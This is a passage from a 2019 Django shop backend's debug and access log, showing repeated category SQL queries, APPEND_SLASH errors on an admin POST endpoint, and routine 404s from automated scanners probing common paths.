ASC; args=(3,) DEBUG 2019-12-18 14:17:36,487 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 14:17:36,490 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 14:17:36,493 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 14:17:36,496 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 14:17:36,499 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 14:17:36,503 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 14:17:36,506 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 14:17:36,508 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 14:17:36,511 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 14:17:36,513 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 14:17:36,517 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 14:17:36,523 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 14:17:36,527 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 14:17:36,531 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 14:17:36,534 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 14:17:36,538 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 14:17:36,542 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 14:17:36,544 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 14:17:36,546 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 14:17:36,549 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 14:17:36,551 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 14:17:36,555 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 14:17:36,559 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 14:17:36,562 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 14:17:36,566 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 14:17:36,570 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 14:17:36,572 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 14:17:36,575 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 14:17:36,578 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 14:17:36,580 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 14:17:36,583 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 14:17:36,586 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 14:17:36] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 14:17:44,597 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 14:17:44,601 utils 4252 140031492613888 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 14:17:44] "GET /api/v1/fire/ HTTP/1.0" 200 482 [18/Dec/2019 14:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [18/Dec/2019 14:25:10] "GET / HTTP/1.0" 302 0 [18/Dec/2019 14:30:12] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [18/Dec/2019 14:31:57] "POST /editBlackAndWhiteList HTTP/1.0" 500 63898 [18/Dec/2019 14:36:23] "GET / HTTP/1.0" 302 0 [18/Dec/2019 14:40:02] "GET /whm-server-status HTTP/1.0" 301 0 [18/Dec/2019 14:41:25] "GET / HTTP/1.0" 302 0 Not Found: /Temporary_Listen_Addresses/WSMAN [18/Dec/2019 14:41:41] "GET /Temporary_Listen_Addresses/WSMAN HTTP/1.0" 404 6516 [18/Dec/2019 14:46:28] "GET / HTTP/1.0" 302 0 [18/Dec/2019 14:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [18/Dec/2019 14:51:30] "GET / HTTP/1.0" 302 0 [18/Dec/2019 14:56:32] "GET / HTTP/1.0" 302 0 [18/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 15:10:04] "GET / HTTP/1.0" 302 0 [18/Dec/2019 15:17:08] "GET / HTTP/1.0" 302 0 [18/Dec/2019 15:22:11] "GET / HTTP/1.0" 302 0 [18/Dec/2019 15:29:31] "GET / HTTP/1.0" 302 0 [18/Dec/2019 15:37:13] "GET / HTTP/1.0" 302 0 [18/Dec/2019 15:42:53] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [18/Dec/2019 15:43:55] "POST /editBlackAndWhiteList HTTP/1.0" 500 63898 Not Found: /wp-login.php [18/Dec/2019 15:50:29] "GET /wp-login.php HTTP/1.0" 404 6461 [18/Dec/2019 15:51:59] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [18/Dec/2019 15:54:07] "GET /wp-login.php HTTP/1.0" 404 6461 [18/Dec/2019 15:57:02] "GET / HTTP/1.0" 302 0 [18/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 16:12:54] "GET / HTTP/1.0" 302 0 [18/Dec/2019 16:17:57] "GET / HTTP/1.0" 302 0 [18/Dec/2019 16:23:00] "GET / HTTP/1.0" 302 0 Not Found: /external.php [18/Dec/2019 16:23:37] "GET /external.php HTTP/1.0" 404 6456 [18/Dec/2019 16:28:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 16:33:05] "GET / HTTP/1.0" 302 0 [18/Dec/2019 16:38:08] "GET / HTTP/1.0" 302 0 [18/Dec/2019 16:43:11] "GET / HTTP/1.0" 302 0 [18/Dec/2019 16:48:14] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [18/Dec/2019 16:48:57] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [18/Dec/2019 16:48:59] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=180 HTTP/1.0" 404 6532 Not Found: /newslist.asp [18/Dec/2019 16:49:01] "GET /newslist.asp?type=4&id=1328 HTTP/1.0" 404 6476 [18/Dec/2019 16:53:16] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [18/Dec/2019 16:56:20] "GET /proxy.php HTTP/1.0" 404 6452 [18/Dec/2019 16:58:19] "GET / HTTP/1.0" 302 0 [18/Dec/2019 17:03:30] "GET / HTTP/1.0" 302 0 [18/Dec/2019 17:08:46] "GET / HTTP/1.0" 302 0 [18/Dec/2019 17:18:13] "GET / HTTP/1.0" 302 0 [18/Dec/2019 17:23:16] "GET / HTTP/1.0" 302 0 [18/Dec/2019 17:29:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 17:35:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 17:38:16,883 utils 4252 140031492613888 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'phpmyadmin'; args=('phpmyadmin',) Not Found: /phpmyadmin/ [18/Dec/2019 17:38:16] "GET /phpmyadmin/ HTTP/1.0" 404 1736 [18/Dec/2019 17:40:20] "GET / HTTP/1.0" 302 0 [18/Dec/2019 17:45:23] "GET / HTTP/1.0" 302 0 [18/Dec/2019 17:50:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [18/Dec/2019 17:54:09] "GET /robots.txt HTTP/1.0" 404 6451 [18/Dec/2019 18:00:00] "GET / HTTP/1.0" 302 0 [18/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 [18/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [18/Dec/2019 18:20:11] "GET / HTTP/1.0" 302 0 [18/Dec/2019 18:29:57] "GET / HTTP/1.0" 302 0 [18/Dec/2019 18:34:59] "GET / HTTP/1.0" 302 0 [18/Dec/2019 18:40:01] "GET / HTTP/1.0" 302 0 [18/Dec/2019 18:40:02] "GET / HTTP/1.0" 302 0 [18/Dec/2019 18:45:05] "GET / HTTP/1.0" 302 0 [18/Dec/2019 18:50:07] "GET / HTTP/1.0" 302 0 [18/Dec/2019 18:55:10] "GET / HTTP/1.0" 302 0 [18/Dec/2019 19:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [18/Dec/2019 19:01:11] "GET / HTTP/1.0" 302 0 [18/Dec/2019 19:05:02] "GET / HTTP/1.0" 302 0 [18/Dec/2019 19:10:05] "GET / HTTP/1.0" 302 0 [18/Dec/2019 19:15:08] "GET / HTTP/1.0" 302 0 [18/Dec/2019 19:20:10] "GET / HTTP/1.0" 302 0 [18/Dec/2019 19:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [18/Dec/2019 19:25:13] "GET / HTTP/1.0" 302 0 [18/Dec/2019 19:27:38] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 19:27:47,098 utils 4252 140031492613888 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '49ecl853a9m2c2rzra3ui5mm5zujy1xy' LIMIT 1; args=('49ecl853a9m2c2rzra3ui5mm5zujy1xy',) DEBUG 2019-12-18 19:27:47,100 utils 4252 140031492613888 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('49ecl853a9m2c2rzra3ui5mm5zujy1xy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-01T19:27:47.098744+00:00'::timestamptz); args=('49ecl853a9m2c2rzra3ui5mm5zujy1xy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 1, 19, 27, 47, 98744, tzinfo=)) [18/Dec/2019 19:27:47] "GET /login/?next=/ HTTP/1.0" 200 1786 [18/Dec/2019 19:30:16] "GET / HTTP/1.0" 302 0 [18/Dec/2019 19:35:18] "GET / HTTP/1.0" 302 0 [18/Dec/2019 19:42:30] "GET / HTTP/1.0" 302 0 [18/Dec/2019 19:51:07] "GET / HTTP/1.0" 302 0 [18/Dec/2019 19:56:10] "GET / HTTP/1.0" 302 0 [18/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [18/Dec/2019 20:18:54] "GET / HTTP/1.0" 302 0 [18/Dec/2019 20:19:53] "GET / HTTP/1.0" 302 0 [18/Dec/2019 20:24:56] "GET / HTTP/1.0" 302 0 [18/Dec/2019 20:29:59] "GET / HTTP/1.0" 302 0 [18/Dec/2019 20:37:33] "GET / HTTP/1.0" 302 0 [18/Dec/2019 20:42:36] "GET / HTTP/1.0" 302 0 [18/Dec/2019 20:47:38] "GET / HTTP/1.0" 302 0 [18/Dec/2019 20:55:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 21:10:05] "GET / HTTP/1.0" 302 0 [18/Dec/2019 21:15:08] "GET / HTTP/1.0" 302 0 [18/Dec/2019 21:22:22] "GET / HTTP/1.0" 302 0 [18/Dec/2019 21:27:38] "GET / HTTP/1.0" 302 0 [18/Dec/2019 21:28:01] "GET / HTTP/1.0" 302 0 [18/Dec/2019 21:33:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [18/Dec/2019 21:34:39] "GET /robots.txt HTTP/1.0" 404 6451 [18/Dec/2019 21:34:42] "GET / HTTP/1.0" 302 0 [18/Dec/2019 21:39:24] "GET / HTTP/1.0" 302 0 [18/Dec/2019 21:44:27] "GET / HTTP/1.0" 302 0 [18/Dec/2019 21:49:30] "GET / HTTP/1.0" 302 0 [18/Dec/2019 21:58:56] "GET / HTTP/1.0" 302 0 [18/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 22:14:39] "GET / HTTP/1.0" 302 0 [18/Dec/2019 22:22:51] "GET / HTTP/1.0" 302 0 [18/Dec/2019 22:27:54] "GET / HTTP/1.0" 302 0 [18/Dec/2019 22:32:57] "GET / HTTP/1.0" 302 0 [18/Dec/2019 22:42:31] "GET / HTTP/1.0" 302 0 [18/Dec/2019 22:47:33] "GET / HTTP/1.0" 302 0 [18/Dec/2019 22:55:46] "GET / HTTP/1.0" 302 0 [18/Dec/2019 23:05:02] "GET / HTTP/1.0" 302 0 [18/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [18/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [18/Dec/2019 23:21:41] "GET / HTTP/1.0" 302 0 [18/Dec/2019 23:27:55] "GET / HTTP/1.0" 302 0 [18/Dec/2019 23:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [18/Dec/2019 23:32:58] "GET / HTTP/1.0" 302 0 [18/Dec/2019 23:38:01] "GET / HTTP/1.0" 302 0 [18/Dec/2019 23:45:56] "GET / HTTP/1.0" 302 0 [18/Dec/2019 23:53:30] "GET / HTTP/1.0" 302 0 [18/Dec/2019 23:58:33] "GET / HTTP/1.0" 302 0 [19/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [19/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [19/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [19/Dec/2019 00:18:03] "HEAD /robots.txt HTTP/1.0" 404 6454 [19/Dec/2019 00:20:11] "GET / HTTP/1.0" 302 0 [19/Dec/2019 00:25:13] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 104.89.149.168/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [19/Dec/2019 00:27:33] "POST /editBlackAndWhiteList HTTP/1.0" 500 63918 [19/Dec/2019 00:30:15] "GET / HTTP/1.0" 302 0 [19/Dec/2019 00:39:12] "GET / HTTP/1.0" 302 0 [19/Dec/2019 00:44:15] "GET / HTTP/1.0" 302 0 [19/Dec/2019 00:46:44] "HEAD / HTTP/1.0" 302 0 [19/Dec/2019 00:48:18] "HEAD / HTTP/1.0" 302 0 [19/Dec/2019 00:49:48] "HEAD / HTTP/1.0" 302 0 [19/Dec/2019 00:53:25] "GET / HTTP/1.0" 302 0 [19/Dec/2019 00:58:28] "GET / HTTP/1.0" 302 0 [19/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [19/Dec/2019 01:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 01:13:58] "GET / HTTP/1.0" 302 0 [19/Dec/2019 01:19:00] "GET / HTTP/1.0" 302 0 [19/Dec/2019 01:24:03] "GET / HTTP/1.0" 302 0 [19/Dec/2019 01:29:05] "GET / HTTP/1.0" 302 0 [19/Dec/2019 01:35:17] "GET / HTTP/1.0" 302 0 [19/Dec/2019 01:40:20] "GET / HTTP/1.0" 302 0 [19/Dec/2019 01:48:18] "GET / HTTP/1.0" 302 0 [19/Dec/2019 01:53:21] "GET / HTTP/1.0" 302 0 Not Found: 